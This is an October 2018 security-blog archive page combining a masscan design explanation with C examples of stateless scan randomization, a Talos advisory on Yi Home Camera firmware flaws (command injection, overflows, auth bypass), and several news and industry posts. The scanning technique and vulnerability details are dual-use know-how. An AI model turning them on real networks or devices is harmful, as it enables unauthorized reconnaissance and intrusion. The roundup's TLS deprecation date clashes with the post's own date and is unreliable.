Monthly Archives: October 2018

Masscan and massive address lists

I saw this go by on my Twitter feed. I thought I'd blog on how masscan solves the same problem.

Both nmap and masscan are port scanners. The difference is that nmap does an intensive scan on a limited range of addresses, whereas masscan does a light scan on a massive range of addresses, including the entire address space (all addresses). If you've got a 10-gbps link to the Internet, it can scan the entire thing in under 10 minutes, from a single desktop-class computer.

How masscan deals with exclude ranges is probably its defining feature. That seems kinda strange, since it's a little-used feature in nmap. But when you scan the entire Internet, people will complain, with nasty emails, so you are going to build up a list of hundreds, if not thousands, of addresses to exclude from your scans.

Therefore, the first design choice is to combine the two lists, the list of targets to include and the list of targets to exclude. Other port scanners don't do this because they typically work from a large include list and a short exclude list, so they optimize for the larger thing. In mass scanning the Internet, the exclude list is the largest thing, so that's what we optimize for. It makes sense to just combine the two lists.

So the performance question isn't how to look up an address in an exclude list efficiently, it's how to quickly choose a random address from a large include target list.

Moreover, the decision is how to do it with as little state as possible. That's the trick for sending massive numbers of packets at rates of 10 million packets-per-second: not keeping any bookkeeping of what was scanned. I'm not sure exactly how nmap randomizes its addresses, but the documentation implies that it does a block of addresses at a time, and randomizes that block, keeping state on which addresses it's scanned and which ones it hasn't.

The way masscan works is not to pick a random IP address so much as to randomize the index.

To start with, we create a sorted list of IP address ranges, the targets. The total number of IP addresses in all the ranges is target_count (not the number of ranges, but the number of all IP addresses). We then define a function pick() that returns one of those IP addresses given the index:

    ip = pick(targets, index);

Where index is in the range [0..target_count].

This function is just a binary search. After the ranges have been sorted, a start_index value is added to each range, which is the total number of IP addresses up to that point. Thus, given a random index, we search the list of start_index values to find which range we've chosen, and then which IP address within that range. The function is here, though reading it, I realize I need to refactor it to make it clearer. (I read the comments telling me to refactor it, and I realize I haven't gotten around to that yet :-).

Given this system, we can now do an in-order (not randomized) port scan by doing the following:

    for (index=0; index<target_count; index++) {
        ip = pick(targets, index);
        /* probe ip here */
    }
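As an added example (written for this page, not masscan's own range-list code), here is the sorted range list with its start_index prefix sums and a pick() implemented as the binary search the paragraph describes, driven by the in-order loop above. The struct names, the ip4() helper and the three sample ranges are constructed for the illustration; the ranges are assumed not to overlap, which masscan's include/exclude merge guarantees and this code merely requires.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Added example, not masscan's own code: one contiguous IPv4 range plus the
 * start_index prefix sum that lets pick() turn a flat index into an address. */
struct range {
    uint32_t begin;        /* first address, inclusive, host byte order */
    uint32_t end;          /* last address, inclusive */
    uint64_t start_index;  /* number of addresses in all ranges sorted before this one */
};

struct targets {
    struct range *list;
    size_t count;           /* number of ranges */
    uint64_t target_count;  /* number of individual addresses across all ranges */
};

uint32_t ip4(unsigned a, unsigned b, unsigned c, unsigned d) {
    return (a << 24) | (b << 16) | (c << 8) | d;
}

static int cmp_range(const void *a, const void *b) {
    const struct range *x = a, *y = b;
    return (x->begin > y->begin) - (x->begin < y->begin);
}

/* Sort the ranges, then assign each its start_index. Precondition (assumed
 * here, guaranteed by masscan's include/exclude merge): ranges do not overlap. */
void targets_finalize(struct targets *t) {
    uint64_t total = 0;
    qsort(t->list, t->count, sizeof t->list[0], cmp_range);
    for (size_t i = 0; i < t->count; i++) {
        t->list[i].start_index = total;
        total += (uint64_t)t->list[i].end - t->list[i].begin + 1;
    }
    t->target_count = total;
}

/* pick(): binary search for the last range whose start_index <= index,
 * then offset into it. Requires index < target_count and count >= 1. */
uint32_t pick(const struct targets *t, uint64_t index) {
    size_t lo = 0, hi = t->count;  /* the answer lies in [lo, hi) */
    while (hi - lo > 1) {
        size_t mid = lo + (hi - lo) / 2;
        if (t->list[mid].start_index <= index)
            lo = mid;
        else
            hi = mid;
    }
    return t->list[lo].begin + (uint32_t)(index - t->list[lo].start_index);
}

/* Constructed sample: three non-overlapping ranges given out of order,
 * 8 addresses in total (4 + 3 + 1). */
struct targets *sample_targets(void) {
    static struct range ranges[3];
    static struct targets t = { ranges, 3, 0 };
    ranges[0].begin = ip4(192, 168, 1, 10); ranges[0].end = ip4(192, 168, 1, 12);
    ranges[1].begin = ip4(10, 0, 0, 0);     ranges[1].end = ip4(10, 0, 0, 3);
    ranges[2].begin = ip4(172, 16, 0, 5);   ranges[2].end = ip4(172, 16, 0, 5);
    targets_finalize(&t);
    return &t;
}

int main(void) {
    const struct targets *t = sample_targets();
    /* the in-order scan loop from the post: index 0 .. target_count-1 */
    for (uint64_t index = 0; index < t->target_count; index++) {
        uint32_t ip = pick(t, index);
        printf("index %llu -> %u.%u.%u.%u\n", (unsigned long long)index,
               (unsigned)(ip >> 24), (unsigned)(ip >> 16) & 255,
               (unsigned)(ip >> 8) & 255, (unsigned)ip & 255);
    }
    return 0;
}
```

After sorting, the sample's start_index values are 0, 4 and 5, so index 3 is the last address of 10.0.0.0-3, index 4 is 172.16.0.5 and index 7 is 192.168.1.12; the search costs O(log ranges) per probe and no per-address state.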

Now, to scan in random order, we simply need to randomize the index variable.

    for (index=0; index<target_count; index++) {
        xXx = shuffle(index);
        ip = pick(targets, xXx);
        /* probe ip here */
    }

The clever bit is in that shuffle function (here). It has to take an integer in the range [0..target_count] and return another pseudo-random integer in the same range. It has to be a function that does a one-to-one mapping. Again, we are stateless. We can't create a table of all addresses, randomize the order of the table, and then enumerate that table. We instead have to do it with an algorithm.

The basis of that algorithm, by the way, is DES, the Data Encryption Standard. That's how a block cipher works. It takes a 64-bit number (the block size for DES) and outputs another 64-bit block in a one-to-one mapping. In ECB mode, every block is encrypted to a unique other block. Two input blocks can't encrypt into the same output block, or you couldn't decrypt it.

The only problem is the range isn't neat 64-bit blocks, or any number of bits. It's an inconveniently sized number. The cryptographer Phillip Rogaway wrote a paper on how to change DES to support integer ranges instead. The upshot is that it uses integer division instead of shifts, which makes it more expensive.

So the way we randomize that index is to encrypt it, with a cipher whose output is still in the same range.

Thus, the source of masscan's speed is the way it randomizes the IP addresses in a wholly stateless manner. It:
  • doesn't use any state, just enumerates an index from [0..target_count]
  • has a fast function that, given an index, retrieves the indexed IP address from a large list of ranges
  • has a fast function to randomize that index using the Power of Crypto
Given this as the base, there's lots of additional features we can add. For one thing, we are randomizing not only IP addresses to scan, but also ports. I think nmap picks the IP address first, then runs through a list of ports on that address. Masscan combines them all together, so when scanning many ports on an address, they won't come as a burst in the middle of the scan, but will be spread evenly throughout the scan. It allows you to do things like:

    masscan -p0-65535

For this to work, we make the following change to the inner loop:

    range = port_count * target_count;
    for (index=0; index<range; index++) {
        xXx = shuffle(index);
        ip = pick(targets, xXx % target_count);  /* remainder selects the address */
        port = pick(ports, xXx / target_count);  /* quotient selects the port from the port range list */
        scan(ip, port);
    }

By the way, the compiler optimizes both the modulus and division operations into a single IDIV opcode on Intel x86, since that's how that instruction works, returning both results at once. Which is cool.

Another change we can make is sharding, spreading the scan across several CPUs or several servers. Let's say this is server #3 out of 7 servers sharing the load of the scan:

    for (index=shard; index<range; index += shard_count) {
        /* loop body unchanged from above */
    }

Again, notice how we don't keep track of any state here, it's just a minor tweak to the loop, and now *poof* the sharding feature appears out of nowhere. It takes vastly more instructions to parse the configuration parameter (masscan --shard 3/7 ...) than it takes to actually do it.

Let's say that we want to pause and resume the scan. What state information do we need to save? The answer is just the index variable. Well, we also need the list of IP addresses that we are scanning. A limitation of this approach is that we cannot easily pause a scan and change the list of IP addresses.
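The shuffle, the combined ip/port split, the shard stride and the resume-from-index entry point described above, as one added example (not masscan's own blackrock/DES-based code): the one-to-one mapping is a small Feistel network with cycle walking, the "cipher on an arbitrary integer range" construction from Rogaway's paper, and the block goes one step further than the text by checking that all shards together hit every (ip, port) pair exactly once. The round function, key, struct and function names and the 8-targets-by-5-ports sample are constructed for the example; the mixer is not a cipher, only a bijection, which is all the scan loop needs.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Constructed stand-in for masscan's DES-derived shuffle (not its code): a
 * 4-round Feistel network over the smallest even-width block that holds
 * `range`, plus cycle walking so outputs stay in [0, range). */
struct shuffle {
    uint64_t range;      /* permutes the index space [0, range) */
    unsigned half_bits;  /* width of each Feistel half */
    uint64_t half_mask;
    uint64_t key;        /* seed: a different key gives a different order */
};

void shuffle_init(struct shuffle *s, uint64_t range, uint64_t key) {
    unsigned bits = 1;                               /* ceil(log2(range)) */
    while (bits < 62 && ((uint64_t)1 << bits) < range)
        bits++;
    s->range = range;
    s->half_bits = (bits + 1) / 2;                   /* block is 2*half_bits wide */
    s->half_mask = ((uint64_t)1 << s->half_bits) - 1;
    s->key = key;
}

/* Plain integer mixer, not a cipher; the Feistel structure makes the map one-to-one. */
static uint64_t round_fn(uint64_t r, uint64_t key, unsigned rnd, uint64_t mask) {
    uint64_t x = (r + rnd) ^ key;
    x *= 0x9E3779B97F4A7C15ULL; x ^= x >> 31;
    x *= 0xBF58476D1CE4E5B9ULL; x ^= x >> 29;
    return x & mask;
}

/* Bijection on the full block domain [0, 2^(2*half_bits)). */
static uint64_t feistel(const struct shuffle *s, uint64_t x) {
    uint64_t l = x >> s->half_bits, r = x & s->half_mask;
    for (unsigned i = 0; i < 4; i++) {
        uint64_t t = l ^ round_fn(r, s->key, i, s->half_mask);
        l = r, r = t;
    }
    return (l << s->half_bits) | r;
}

/* shuffle(): index -> pseudo-random index in the same range. Cycle walking re-applies
 * the block permutation until the value lands in [0, range); since feistel() is a
 * bijection this terminates and the result is itself a bijection on [0, range). */
uint64_t shuffle_index(const struct shuffle *s, uint64_t index) {
    uint64_t x = index;
    do x = feistel(s, x); while (x >= s->range);
    return x;
}

struct probe { uint64_t ip_index, port_index; };

/* The combined ip/port split from the post's inner loop (one IDIV). */
struct probe split_index(uint64_t xXx, uint64_t target_count) {
    struct probe p = { xXx % target_count, xXx / target_count };
    return p;
}

/* One shard: indices start, start+shard_count, ... below range. A fresh scan passes
 * start == shard; a resumed one passes the saved index, the only state a pause needs.
 * If `seen` is non-NULL, visits per (ip, port) cell are counted there. Returns probes sent. */
uint64_t run_scan(const struct shuffle *s, uint64_t target_count, uint64_t start,
                  unsigned shard_count, unsigned char *seen) {
    uint64_t n = 0;
    for (uint64_t index = start; index < s->range; index += shard_count) {
        struct probe p = split_index(shuffle_index(s, index), target_count);
        if (seen)
            seen[p.port_index * target_count + p.ip_index]++;
        n++;
    }
    return n;
}

/* Probes one shard emits from `start` (checks the shard stride and resume). */
uint64_t shard_probe_count(uint64_t target_count, uint64_t port_count, uint64_t start,
                           unsigned shard_count, uint64_t key) {
    struct shuffle s;
    shuffle_init(&s, target_count * port_count, key);
    return run_scan(&s, target_count, start, shard_count, NULL);
}

/* 1 if all shards together hit each (ip, port) cell exactly once: the shuffle is a
 * permutation of [0, range) and the shards partition the index space. */
int covers_exactly_once(uint64_t target_count, uint64_t port_count,
                        unsigned shard_count, uint64_t key) {
    uint64_t range = target_count * port_count;
    unsigned char *seen = calloc(range, 1);
    struct shuffle s;
    int ok = seen != NULL;
    shuffle_init(&s, range, key);
    for (unsigned shard = 0; ok && shard < shard_count; shard++)
        run_scan(&s, target_count, shard, shard_count, seen);
    for (uint64_t i = 0; ok && i < range; i++)
        if (seen[i] != 1)
            ok = 0;
    free(seen);
    return ok;
}

int main(void) {   /* constructed sample: 8 targets x 5 ports, split over 7 shards */
    printf("every (ip, port) pair probed exactly once: %d\n", covers_exactly_once(8, 5, 7, 0x1234));
    return 0;
}
```

covers_exactly_once() is the property the whole design rests on: if the index map were not a bijection, some (ip, port) pair would be probed twice and another never. shard_probe_count(8, 5, 3, 7, key) returns 6 (indices 3, 10, 17, 24, 31, 38), and resuming after a pause is just a different start value with the same key and the same target list.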


The upshot here is that we've twisted the nature of the problem. By using a crypto function to algorithmically create a one-to-one mapping for the index variable, we can just linearly enumerate a scan -- but magically in random order. This avoids keeping state. It avoids having to lookup addresses in an exclude list. And we get other features that naturally fall out of the process.

What about IPv6?

You'll notice I'm talking only about IPv4, and masscan supports only IPv4. The maximum sized scan right now is 48 bits (16-bit port number plus 32-bit IPv4 address). Won't larger scans mean using 256-bit integers?

When I get around to adding IPv6, I'll still keep a 64-bit index. The index variable is the number of things you are going to probe, and you can't scan a 64-bit space right now. You won't scan the entire IPv6 128-bit address space, but a lot of smaller address spaces that add up to less than 64 bits. So when I get around to adding IPv6, the concept will still work.

NBlog Nov 1 – cloud computing security awareness module released

Cloud computing is a strong and still growing part of the IT industry. It’s a hit!
However, the relative novelty of cloud computing puts inexperienced or naive managers, staff and professionals at something of a disadvantage: lacking appreciation of the technology and the commercial/business context, the information risks and especially the security and other cloud-related controls aren’t exactly obvious.
Information security (in the broadest sense – not just IT or cybersecurity) is a major concern with cloud computing, a source of aggravation and costs for the unaware. The organization's professionals/specialists in areas such as IT, risk, compliance and business continuity should have a deeper understanding of the pros and cons of clouds, but have you ever wondered how that level of knowledge is achieved?
Simply put, securing the anticipated business benefits of cloud computing involves addressing the information risks that are associated with it.  If the risks are simply ignored, the benefits may be reduced or destroyed by costly security incidents. 

Learning objectives

We have thoroughly updated/rewritten the awareness materials originally delivered back in 2014 - eons ago in Internet time! So what has changed since then? 
Peer through the fog to learn how to avoid the pitfalls and secure the business benefits of cloud computing, with NoticeBored.
  • Introduces and outlines cloud computing, providing general context and background information (e.g. explaining why so many organizations are eagerly adopting it) with as little techno-babble as we can get away with;
  • Informs workers in general about the information risk and security issues and concerns relating to or arising from cloud computing (e.g. the organization’s partial loss of control over its information), plus the business benefits (e.g. reduced costs, greater resilience and flexibility, plus access to cloud specialists). We’re promoting a balanced view;
  • Encourages those considering, specifying, evaluating, contracting for, using or managing cloud computing to identify, analyze and address the information risks, typically through appropriate controls that secure the business benefits as much as the data;
  • Promotes information risk and security management as a business enabler, without which cloud computing would be unacceptably risky.
Review your organization’s use of cloud computing - the apps, dependent business processes, strategies, policies and incidents. Are there any cloud-related risks on the corporate radar? How well are they understood and treated? What’s missing? What stands out? Talk to the relevant experts about it. Flush any issues and ideas into the open, incorporating them where appropriate into your awareness delivery.

And talk to us about subscribing to turbo-charge your awareness program. 

Announcing some security treats to protect you from attackers’ tricks

It’s Halloween 🎃 and the last day of Cybersecurity Awareness Month 🔐, so we’re celebrating these occasions with security improvements across your account journey: before you sign in, as soon as you’ve entered your account, when you share information with other apps and sites, and the rare event in which your account is compromised.

We’re constantly protecting your information from attackers’ tricks, and with these new protections and tools, we hope you can spend your Halloween worrying about zombies, witches, and your candy loot—not the security of your account.

Protecting you before you even sign in
Everyone does their best to keep their username and password safe, but sometimes bad actors may still get them through phishing or other tricks. Even when this happens, we will still protect you with safeguards that kick in before you are signed into your account.

When your username and password are entered on Google’s sign-in page, we’ll run a risk assessment and only allow the sign-in if nothing looks suspicious. We’re always working to improve this analysis, and we’ll now require that JavaScript is enabled on the Google sign-in page, without which we can’t run this assessment.

Chances are, JavaScript is already enabled in your browser; it helps power lots of the websites people use every day. But, because it may save bandwidth or help pages load more quickly, a tiny minority of our users (0.1%) choose to keep it off. This might make sense if you are reading static content, but we recommend that you keep JavaScript on while signing into your Google Account so we can better protect you. You can read more about how to enable JavaScript here.

Keeping your Google Account secure while you’re signed in

Last year, we launched a major update to the Security Checkup that upgraded it from the same checklist for everyone, to a smarter tool that automatically provides personalized guidance for improving the security of your Google Account.

We’re adding to this advice all the time. Most recently, we introduced better protection against harmful apps based on recommendations from Google Play Protect, as well as the ability to remove your account from any devices you no longer use.

More notifications when you share your account data with apps and sites

It’s really important that you understand the information that has been shared with apps or sites so that we can keep you safe. We already notify you when you’ve granted access to sensitive information — like Gmail data or your Google Contacts — to third-party sites or apps, and in the next few weeks, we’ll expand this to notify you whenever you share any data from your Google Account. You can always see which apps have access to your data in the Security Checkup.

Helping you get back to the beginning if you run into trouble

In the rare event that your account is compromised, our priority is to help get you back to safety as quickly as possible. We’ve introduced a new, step-by-step process within your Google Account that we will automatically trigger if we detect potential unauthorized activity.

We'll help you:
  • Verify critical security settings to help ensure your account isn’t vulnerable to additional attacks and that someone can’t access it via other means, like a recovery phone number or email address.
  • Secure your other accounts because your Google Account might be a gateway to accounts on other services and a hijacking can leave those vulnerable as well.
  • Check financial activity to see if any payment methods connected to your account, like a credit card or Google Pay, were abused.
  • Review content and files to see if any of your Gmail or Drive data was accessed or mis-used.
Online security can sometimes feel like walking through a haunted house—scary, and you aren't quite sure what may pop up. We are constantly working to strengthen our automatic protections to stop attackers and keep you safe from the many tricks you may encounter. During Cybersecurity Month, and beyond, we've got your back.

Vulnerability Spotlight: Multiple Vulnerabilities in Yi Technology Home Camera

Vulnerabilities Discovered by Lilith [x_x] of Cisco Talos.


Cisco Talos is disclosing multiple vulnerabilities in the firmware of the Yi Technology Home Camera. In order to prevent the exploitation of these vulnerabilities, Talos worked with Yi Technology to make sure a newer version of the firmware is available to users. These vulnerabilities could allow an attacker to gain remote code execution on the devices via a command injection, bypass methods of network authentication, or disable the device.

The Yi Home Camera is an internet-of-things (IoT) home camera sold globally. The 27US version is one of the newer models sold in the U.S. and is the most basic model out of the Yi Technology camera lineup.

It includes all the functions that one would expect from an IoT device, including the ability to view the camera's feed from anywhere, offline storage, subscription-based cloud storage and easy setup.

There are many consequences to a security vulnerability within the firmware of this security camera. An attacker could exploit these vulnerabilities to:

  • Disable the camera to prevent it from recording.
  • Delete stored videos on the camera.
  • View video feeds from the camera.
  • Potentially launch attacks against the camera owner's phone app.
  • Act as a foothold into the home network to attack other devices inside.

This list is not complete, and many other consequences could occur, so Talos highly recommends that the devices are patched as soon as possible via the Yi Home application.


Due to the nature of IoT devices, more attack surfaces are available on a given device than in a typical server or client program. For half of the vulnerabilities, physical access is required to exploit them, which obviously makes them less of a concern if the camera is stored safely inside the venue it is protecting, but for the other five vulnerabilities there is a network attack vector, raising their severity and the importance of getting the latest firmware.

Before summarizing these network-based vulnerabilities, it is important to note that they are all made possible by TALOS-2018-0616, as all of these vulnerabilities are over cleartext protocols, either unencrypted UDP or HTTP. If the slight performance hit was taken to implement the core network functionality over HTTPS, these vulnerabilities would either not have been as severe, or not have been exploitable at all.

Denial of service:

TALOS-2018-0602 and TALOS-2018-0595 were both found within the p2p_tnp binary, which is the main controller for phone-to-camera and cloud-to-camera communication. That binary also implements a custom UDP peer-to-peer (p2p) protocol for all of the aforementioned features. In both vulnerabilities, some opcodes that appear to be leftover artifacts could be accessed without authentication, which would allow an attacker to either permanently disable the video feed or cause unlimited memory to be allocated, both rendering the camera useless.

Remote Code Execution:

TALOS-2018-0567 is easily the most severe vulnerability out of the batch, requiring only the ability to respond to an HTTP request from the camera in order to hit a command injection and subsequent code execution. The vulnerable time_sync request happens extremely often as soon as the device connects to the network.

Administrative Access:

The last of the network-based vulnerabilities, TALOS-2018-0601 allows an attacker to reuse tokens that can be sniffed over the wire via TALOS-2018-0616 so that one sniffed token can be used an unlimited number of times by an attacker to access the p2p_tnp API that is normally reserved for the camera's owner via the Yi Home phone application. This access only lasts until the device reboots, at which point another token needs to be sniffed.

Physical and Local Attack Vectors:

As noted above, IoT devices tend to lend themselves to vulnerabilities with more unusual attack vectors, and the Yi Home Camera is no exception. Vulnerabilities were found via the firmware update functionality (TALOS-2018-0565, TALOS-2018-0584 and TALOS-2018-0566), the SSID that the camera connects to for wireless access (TALOS-2018-0580) and via the QR code that is used when setting up the device out of the box (TALOS-2018-0572 and TALOS-2018-0571). Because of this, it is suggested that these devices are not kept in areas where they are physically available to others, and once again, that the devices' firmware is updated as soon as possible.

Vulnerability Summaries

TALOS-2018-0565 -- Yi Technology Home Camera 27US Firmware Update Code Execution Vulnerability

An exploitable code execution vulnerability exists in the firmware update functionality of Yi Home Camera 27US. A specially crafted file can cause a logic flaw and command injection, resulting in code execution. An attacker can insert an SD card to trigger this vulnerability.

TALOS-2018-0566 / CVE-2018-3891 - Yi Technology Home Camera 27US Firmware Downgrade Vulnerability

An exploitable firmware downgrade vulnerability exists in the firmware update functionality of Yi Home Camera 27US. A specially crafted file can cause a logic flaw, resulting in a firmware downgrade. An attacker can insert an SD card to trigger this vulnerability.

TALOS-2018-0567 -- Yi Technology Home Camera 27US TimeSync Code Execution Vulnerability

An exploitable code execution vulnerability exists in the time-syncing functionality of Yi Home Camera 27US. A specially crafted packet can cause a buffer overflow, resulting in code execution. An attacker can intercept and alter network traffic to trigger this vulnerability.

TALOS-2018-0571 / CVE-2018-3898-CVE-2018-3899 - Yi Technology Home Camera 27US QR Code trans_info Code Execution Vulnerability

An exploitable code execution vulnerability exists in the QR code-scanning functionality of Yi Home Camera 27US. A specially crafted QR code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability.

TALOS-2018-0572 / CVE-2018-3900 - Yi Technology Home Camera 27US QR Code Base64 Code Execution Vulnerability

An exploitable code execution vulnerability exists in the QR code-scanning functionality of Yi Home Camera 27US. A specially crafted QR code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability.

TALOS-2018-0580 / CVE-2018-3910 - Yi Technology Home Camera 27US cloudAPI SSID Code Execution Vulnerability

An exploitable code execution vulnerability exists in the cloud OTA setup functionality of Yi Home Camera 27US. A specially crafted SSID can cause a command injection, resulting in code execution. An attacker can cause a camera to connect to this SSID to trigger this vulnerability. Alternatively, an attacker can convince a user to connect their camera to this SSID.

TALOS-2018-0595 / CVE-2018-3928 - Yi Technology Home Camera 27US Notice_To Denial Of Service Vulnerability

An exploitable denial-of-service vulnerability exists in the firmware update functionality of Yi Home Camera 27US. A specially crafted set of UDP packets can cause the settings to change, resulting in a denial of service. An attacker can send a set of packets to trigger this vulnerability.

TALOS-2018-0601 / CVE-2018-3934 - Yi Technology Home Camera 27US Nonce Reuse Authentication Bypass Vulnerability

An exploitable authentication bypass vulnerability exists in the firmware update functionality of Yi Home Camera 27US. A specially crafted set of UDP packets can cause a logic flaw, resulting in an authentication bypass. An attacker can sniff network traffic and send a set of packets to trigger this vulnerability.

TALOS-2018-0616 / CVE-2018-3947 - Yi Technology Home Camera 27US p2p_tnp Cleartext Data Transmission Vulnerability

An exploitable information disclosure vulnerability exists in the phone-to-camera communications of Yi Home Camera 27US. An attacker can sniff network traffic to trigger this vulnerability.

TALOS-2018-0602 / CVE-2018-3935 - Yi Technology Home Camera 27US CRCDec Denial Of Service Vulnerability

An exploitable denial-of-service vulnerability exists in the UDP network functionality of Yi Home Camera 27US. A specially crafted set of UDP packets can allocate unlimited memory, resulting in a denial of service. An attacker can send a set of packets to trigger this vulnerability.

Versions Tested

The Yi Technology Home Camera 27US version of the firmware was used during the discovery of the vulnerabilities listed above.

Firmware at Yi Technology 


With the increased convenience of IoT devices, a new set of attack vectors arose that have not been as hardened as traditional ones. As such, Talos recommends that users apply these newly available firmware updates in order to ensure their continued and secure operation. This can be done via the Yi Home phone app, which will notify the user of this new firmware upon being opened. It is also recommended that the user checks the device's firmware version after the update, via the phone app, in order to ensure that the update did in fact occur.


The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or

Snort Rules:
46190-46191, 46294-46295, 46780, 46870.

For other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal here.

To review our Vulnerability Disclosure Policy, please visit this site here.

NIST’s Creation of a Privacy Framework

On Tuesday, Oct. 16, the National Institute of Standards and Technology (NIST) held its “Kicking off the NIST Privacy Framework: Workshop #1” in Austin, Texas. I was honored to be asked to participate. This was the first in a series of public workshops focusing on the development of a useful and voluntary Privacy Framework, like the NIST Cybersecurity Framework (CSF).

Event participation was outstanding. NIST’s initial registration for the event was filled in less than 90 minutes. Realizing they needed a bigger room, NIST moved to a space that nearly doubled the potential attendance. When the reopening of the registration was announced, it was filled in less than an hour. Many well-known names in the privacy field attended, with the audience primarily consisting of privacy consultants, lawyers, and other professionals trying to figure out how the Privacy Framework fits into their future.

NIST previously brought together both public and private sector individuals interested in solving problems that face us all. The CSF was a highly successful effort to develop a lightweight, valuable, and adoptable framework focused on improving the “security programs” of organizations. While initially developed in response to presidential executive order 13636, the CSF was never meant to be a government document. Speaking to critical infrastructure and cybersecurity organization representatives at the first Cybersecurity Framework meeting, previous NIST director Dr. Pat Gallagher said, “This is not NIST’s framework, this is yours.” He was absolutely right.

Over the next year, more than 3,000 professionals participated in CSF workshops, responded to requests for information, and provided comments on work-in-progress drafts. The result was something that achieved the CSF’s initial goals: It’s beneficial to all sectors and is usable by a range of organizations from small businesses to some of the largest corporations on the planet. The CSF is having a positive global influence with its adoption by various countries. It’s also assisting in the global alignment of cybersecurity languages and practices.

NIST has established many of the same goals for the Privacy Framework. These goals include:

  1. Developing the Privacy Framework through a consensus-driven, open, and highly transparent process
  2. Establishing a common language, providing for a consistent means to facilitate communication across all aspects of an organization
  3. Ensuring it is adaptable and scalable to many differing types of organizations, technologies, lifecycle phases, sectors, and uses
  4. Developing a voluntary, risk-based, outcome-based, and non-prescriptive privacy framework
  5. Ensuring it is usable as part of any organization’s broader corporate risk management strategy and processes
  6. Taking advantage of and incorporating existing privacy standards, methodologies, and guidance
  7. Establishing it as a living document that is updated as technology and approaches to privacy change and as stakeholders learn from implementations

During the Privacy Framework Kickoff, I was pleased to hear questions that were similar to what I heard during the initial CSF Kickoff. There was real tension in the room during the CSF Kickoff—a sense of not knowing how it was going to impact organizations’ cybersecurity-related responsibilities. The same tension was present during the Privacy Framework Kickoff conversations. We are just beginning to try to understand a solution that doesn’t yet exist.

It’s hard to see the result of a Privacy Framework from where we sit today. How can we develop and position a framework like this to be valuable for both U.S. and global businesses? What is intended for this effort? What are potential definition needs? What is harm? What new technology could influence this? How do we position this for the next 25 years of privacy, not just the past five?

We have started down a path that will likely take more than a year to complete. I envision the emerging Privacy Framework as addressing best practices in privacy while being compatible with and supporting an organization’s ability to operate under the various domestic and international legal or regulatory regimes. The Privacy Framework should not be focused on the legal aspects of privacy, but rather on what organizations need to consider in their own privacy programs. This is a journey just begun. From my perspective, the workshop on Oct. 16 was an outstanding start to the development of a consensus-driven Privacy Framework. I look forward to the active discussions and work ahead.

The post NIST’s Creation of a Privacy Framework appeared first on McAfee Blogs.

Cyber Security Roundup for October 2018

Aside from Brexit, Cyber Threats and Cyber Attack accusations against Russia are very much on the centre stage of the UK government's international political agenda at the moment. The government publicly accused Russia's military 'GRU' intelligence service of being behind four high-profile cyber-attacks, and named 12 cyber groups it said were associated with the GRU. Foreign Secretary Jeremy Hunt said, "the GRU had waged a campaign of indiscriminate and reckless cyber strikes that served no legitimate national security interest".

UK Police firmly believe the two men who carried out the Salisbury poisoning in March 2018 worked for the GRU.

The UK National Cyber Security Centre said it had assessed "with high confidence" that the GRU was "almost certainly responsible" for the cyber-attacks, and also warned UK businesses to be on the alert for indicators of compromise by the Russian APT28 hacking group. The NCSC said GRU hackers operated under a dozen different names, including Fancy Bear (APT28), and had targeted:
  • The systems database of the Montreal-based World Anti-Doping Agency (Wada), using phishing to gain passwords. Athletes' data was later published 
  • The Democratic National Committee in 2016, when emails and chats were obtained and subsequently published online. The US authorities have already linked this to Russia.
  • Ukraine's Kyiv metro and Odessa airport, Russia's central bank, and two privately-owned Russian media outlets - and news agency Interfax - in October 2017. They used ransomware to encrypt the contents of a computer and demand payment 
  • An unnamed small UK-based TV station between July and August 2015, when multiple email accounts were accessed and content stolen

Facebook was fined the maximum amount of £500,000 under pre-GDPR data protection laws by the UK Information Commissioner's Office (ICO) over the Cambridge Analytica scandal. Facebook could face a new ICO fine after revealing hackers had accessed the contact details of 30 million users due to a flaw with Facebook profiles. The ICO also revealed a 400% increase in reported Cyber Security Incidents, and another report by the legal firm RPC said the average ICO fines had doubled, and to expect higher fines in the future. Heathrow Airport was fined £120,000 by the ICO in October after a staff member lost a USB stick last October containing "sensitive personal data", which was later found by a member of the public.

Notable Significant ICO Security Related Fines

Last month's British Airways website hack was worse than originally reported, as they disclosed a second attack which occurred on 5th September 2018, when the payment page had 22 lines of malicious JavaScript code injected in an attack widely attributed to Magecart. Another airline, Cathay Pacific, also disclosed it had suffered a major data breach that impacted 9.4 million customers' personal data and some credit card data.

Morrisons has lost a challenge to a High Court ruling which made it liable for a data breach, after an employee, since jailed for 8 years, stole and posted thousands of its employees' details online in 2014. Morrisons said it would now appeal to the Supreme Court; if that appeal fails, those affected will be able to claim compensation for "upset and distress".

Interesting article on Bloomberg on "How China Used a Tiny Chip to Infiltrate U.S. Companies". However, there was a counter-narrative to the Bloomberg article on Sky News. That didn't stop ex-Security Minister Admiral Lord West calling out the Chinese when he said Chinese IT kit 'is putting all of us at risk' if used in 5G. He raises a valid point, given the US Commerce Department said it would restrict the export of software and technology goods from American firms to Chinese chipmaker Fujian Jinhua. BT, which uses Huawei to supply parts for its network, told Sky News that it would "apply the same stringent security measures and controls to 5G when we start to roll it out, in line with continued guidance from government". Recently there have been warnings issued by the MoD and NCSC stating that a Chinese espionage group known as APT10 is attacking IT suppliers to target military and intelligence information.

The NCSC is seeking feedback on the latest draft 'knowledge areas' of CyBOK, a cyber security body of knowledge which it is supporting along with academics and the wider security industry.

Google is finally pulling the plug on Google+, after user personal data was left exposed. Google and the other three major web browser providers said, in what seem like coordinated announcements, that businesses must accept that TLS versions 1.0 and 1.1 will no longer be supported after Q1 2018.

So it's time to move over to the more secure TLS v1.2 or the more secure and efficient TLS v1.3.


How to Empower Security Operations With Threat Intelligence

Editor’s Note: Over the next several months, we’ll be sharing excerpts from our new book, “The Threat Intelligence Handbook.” Here, we’re looking at the second chapter, “Threat Intelligence for Security Operations.” To read the full chapter, download your free copy of the handbook.

With the goal of monitoring and analyzing network activity to detect and defeat cybersecurity threats and other anomalies always in mind, the security operations center represents the first line of defense for any organization big enough to have one. And even if your organization is too small to justify the costs of having a dedicated SOC (which can be prodigious), the function of looking out for threats and stopping them is one that nobody can live without.

